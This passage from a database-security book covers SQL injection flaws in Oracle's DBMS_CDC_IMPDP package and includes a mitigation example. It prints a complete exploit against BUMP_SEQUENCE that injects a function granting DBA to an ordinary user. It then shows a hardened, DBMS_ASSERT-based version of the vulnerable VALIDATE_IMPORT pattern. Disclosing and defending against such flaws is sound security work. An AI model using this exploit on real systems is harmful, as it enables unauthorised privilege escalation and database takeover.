5.10. Some Real-World Examples

These examples are taken from 10g Release 2, fully patched; and at the time of writing they are still vulnerable. They have all been reported to Oracle and patches should be available before this book hits the stores.

5.10.1. Exploiting DBMS_CDC_IMPDP

The BUMP_SEQUENCE procedure of the DBMS_CDC_IMPDP package is vulnerable to SQL injection. It is one example of a vulnerability that Oracle's data-flow analysis tool missed because the tainted input crosses the boundary between PL/SQL and C: the procedure is declared in PL/SQL but implemented in an external C library, where the arguments are concatenated into a SQL statement:

PROCEDURE BUMP_SEQUENCE (SEQUENCE_OWNER IN VARCHAR2,
                         SEQUENCE_NAME  IN VARCHAR2,
                         NEW_VALUE      IN NUMBER) IS
EXTERNAL
  NAME "qccdtp_bumpSequence"
  LIBRARY DBMS_CDCAPI_LIB
  PARAMETERS(
    SEQUENCE_OWNER OCISTRING,
    SEQUENCE_NAME  OCISTRING,   -- external type reconstructed; the extracted text drops it
    NEW_VALUE      OCINUMBER)   -- external type reconstructed; the extracted text drops it
LANGUAGE C;

The preceding vulnerability can be exploited as follows:

CONNECT SCOTT/TIGER
SET SERVEROUTPUT ON
CREATE OR REPLACE FUNCTION MYFUNC RETURN VARCHAR2 AUTHID CURRENT_USER IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
DBMS_OUTPUT.PUT_LINE('In function...');
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN 'STR';
END;
/
GRANT EXECUTE ON MYFUNC TO PUBLIC;
EXEC DBMS_CDC_IMPDP.BUMP_SEQUENCE('SYS','BBB''||SCOTT.MYFUNC()||''BBB',0);

The VALIDATE_IMPORT procedure in this package is also vulnerable. The code in this procedure executes the following:

STMT_BUF := 'DELETE FROM "' || VER_PUB || '"."' || VER_VLDTAB
            || '" WHERE import_error = ''Y''';
EXECUTE IMMEDIATE STMT_BUF;
STMT_BUF := 'SELECT name, vldtype FROM "' || VER_PUB || '"."' || VER_VLDTAB || '" ORDER ...
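Both procedures share the same root cause: a caller-supplied identifier (a schema, sequence or table name) is spliced into a SQL statement as text, so whatever the caller passes becomes part of the statement. For BUMP_SEQUENCE the concatenation happens in C and the fix belongs in the external library; for VALIDATE_IMPORT the pattern is the PL/SQL one shown above. The block below is an added example, not code from the book or from Oracle's DBMS_CDC_IMPDP package, showing how the VALIDATE_IMPORT pattern looks once every identifier is validated with DBMS_ASSERT and every data value is bound. The procedure name validate_import_safe, the parameter and variable names, and the :flag bind are assumptions made for this illustration; DBMS_ASSERT.SCHEMA_NAME, ENQUOTE_NAME and SQL_OBJECT_NAME are the real package routines.

```sql
-- Added example (not from the book or from Oracle): hardened form of the
-- VALIDATE_IMPORT dynamic-SQL pattern. Names validate_import_safe, ver_pub,
-- ver_vldtab, safe_pub, safe_tab and :flag are assumptions for this illustration.
CREATE OR REPLACE PROCEDURE validate_import_safe (
    ver_pub     IN VARCHAR2,   -- schema that owns the validation table
    ver_vldtab  IN VARCHAR2    -- validation table name
) AUTHID CURRENT_USER IS
    stmt_buf  VARCHAR2(4000);
    safe_pub  VARCHAR2(130);
    safe_tab  VARCHAR2(130);
BEGIN
    -- SCHEMA_NAME raises an exception unless the argument names an existing schema.
    -- ENQUOTE_NAME wraps the value in double quotes and rejects any embedded
    -- double quote, so the value cannot terminate the quoted identifier early.
    safe_pub := DBMS_ASSERT.ENQUOTE_NAME(DBMS_ASSERT.SCHEMA_NAME(ver_pub), FALSE);
    safe_tab := DBMS_ASSERT.ENQUOTE_NAME(ver_vldtab, FALSE);

    -- SQL_OBJECT_NAME raises unless the qualified name resolves to an existing
    -- object, so a value that is merely a well-formed identifier but names no
    -- table (such as the BUMP_SEQUENCE payload above) is refused here.
    safe_tab := DBMS_ASSERT.SQL_OBJECT_NAME(safe_pub || '.' || safe_tab);

    -- Only validated identifiers are concatenated; the data value is bound.
    stmt_buf := 'DELETE FROM ' || safe_tab || ' WHERE import_error = :flag';
    EXECUTE IMMEDIATE stmt_buf USING 'Y';

    stmt_buf := 'SELECT name, vldtype FROM ' || safe_tab || ' ORDER BY name';
    -- ... fetch and process the rows as the original procedure does ...
END;
/

-- Constructed check: the argument shape used against BUMP_SEQUENCE above never
-- reaches EXECUTE IMMEDIATE; DBMS_ASSERT raises before any statement is built.
SET SERVEROUTPUT ON
BEGIN
    validate_import_safe('SYS', 'BBB''||SCOTT.MYFUNC()||''BBB');
EXCEPTION
    WHEN OTHERS THEN
        DBMS_OUTPUT.PUT_LINE('rejected: ' || SQLERRM);
END;
/
```

The order of the checks matters: ENQUOTE_NAME on its own only guarantees that the value is a syntactically valid quoted identifier, which is enough to stop a double-quote breakout from the `"..."` wrapper used in VALIDATE_IMPORT but still lets arbitrary text through as an identifier; SQL_OBJECT_NAME then pins the name to an object that actually exists. Bind variables handle the data value, so there is no reason for the `''Y''` literal to be assembled by hand.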
